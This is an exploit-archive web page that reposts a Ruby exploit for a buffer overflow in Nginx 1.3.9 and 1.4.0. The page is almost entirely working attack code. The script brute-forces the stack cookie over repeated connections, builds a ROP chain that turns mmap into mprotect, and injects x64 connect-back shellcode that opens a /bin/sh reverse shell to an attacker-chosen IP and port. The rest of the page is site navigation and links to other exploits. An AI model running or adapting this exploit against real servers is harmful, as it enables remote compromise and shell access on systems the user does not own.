首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nginx 1.3.9 / 1.4.0 Buffer Overflow
来源:vnsecurity.net 作者:Hoang 发布时间:2013-07-19  
# encoding: ASCII
abort("#{___FCKpd___0} host port") if ARGV.length < 2
require 'ronin'

$count = 0

# rop address taken from nginx binary (find in the repo)
poprdi = 0x00427006 
poprsi = 0x0043a00e 
poprdx = 0x0041b8fa 
poprax = 0x00442c80 

mmap64   = 0x4029b0
mmapgot  = 0x67f290
mmapaddr = 0x00410000

rsito_rax_ = 0x0042afcb
add_rdi_al = 0x00462de4

# change mmap64 to mprotect, easier to find gadget
$ropchain = [
  poprax, 0x60,
  poprdi, mmapgot,
  add_rdi_al,

  poprax, mmapgot,
  poprdx, 0x7,
  poprsi, 0x1000,
  poprdi, mmapaddr,
  mmap64
].pack("Q*")

#connect back shellcode x64
ip = "0.0.0.0" 
port = 4000
sip = IPAddr::new(ip).to_i.pack(:int_be)
sport = port.pack(:int16_be)

$shellcode  = "\x48\x31\xd2\x48\x31\xc0\xb2\x02\x48\x89\xd7\xb2\x01\x48\x89\xd6\xb2\x06\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xbb#{sip}\x48\xc1\xe3\x20\x66\xb8#{sport}\xc1\xe0\x10\xb0\x02\x48\x09\xd8\x50\x48\x89\xe6\x48\x31\xd2\xb2\x10\x48\x31\xc0\xb0\x2a\x0f\x05\x48\x31\xf6\x48\x31\xc0\xb0\x21\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb0\x21\x48\xff\xc6\x0f\x05\x48\x31\xf6\x48\x31\xd2\x52\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05\xc3"

$shellcode << ("\x90" * (8 - ($shellcode.length % 8)))

# copy the shellcode to mmapaddr
(0...$shellcode.length).step(8) { |p|
  code  = $shellcode[p,8].unpack(:uint64)[0]
  chain = [poprax, mmapaddr + p, poprsi, code, rsito_rax_].pack("Q*")

  $ropchain << chain
}

# finally jump to it
$ropchain << mmapaddr.pack(:uint64) 

# payload for crash
$payload = [ 
  "GET / HTTP/1.1\r\n",
  "Host: 1337.vnsec.net\r\n",
  "Accept: */*\r\n",
  "Transfer-Encoding: chunked\r\n\r\n"
].join
$chunk = "f"*(1024-$payload.length-8) + "0f0f0f0f"
$payload << $chunk

def crash(cookie, cookie_test=true)
  data = ''
  payload = $payload.dup
  payload << ["A"*(4096+8), cookie].join
  payload << ["C"*24, $ropchain].join unless cookie_test

  5.times do
    tcp_session(ARGV[0],ARGV[1].to_i) do |s|
      $count += 1
      s.send(payload, 0)
      data = s.recv(10)
    end

    return true if data.strip.empty?
  end

  return false
end

s = [0]
if ARGV.length < 3
  # test cookie
  while s.length < 8
    print_info "searching for byte: #{s.length}"
    (1..255).each do |c|
      print "\r#{c}"
      s1 = s + [c]

      unless crash(s1.pack("c*"))
        s << c
        puts
        break
      end
    end
  end
  s = s.pack("c*")
else
  # try it ?
  s = (ARGV[2]).gsub("\\x","").hex_decode

  if crash(s)
    print_error "Wrong cookie"
    exit
  end
end

print_info "Found cookie: #{s.hex_escape} #{s.length}"

print_info "PRESS ENTER TO GIVE THE SHIT TO THE HOLE AT #{ip} #{port}"
$stdin.readline 

crash(s, false)
print_info "#{$count} connections"



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Quicktime 7 Invalid Atom
·PCMan FTP Server 2.0.7 - Remot
·HP Managed Printing Administra
·VbsEdit 5.9.3 (.smi) - Buffer
·Windows Movie Maker Version 2.
·Samsung PS50C7700 TV - Denial
·Symantec Workspace Virtualizat
·D-Link Devices UPnP SOAP Comma
·Foreman (Red Hat OpenStack/Sat
·Microsoft Office PowerPoint 20
·VMware vCenter Chargeback Mana
·BlazeDVD Pro player 6.1 - Stac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved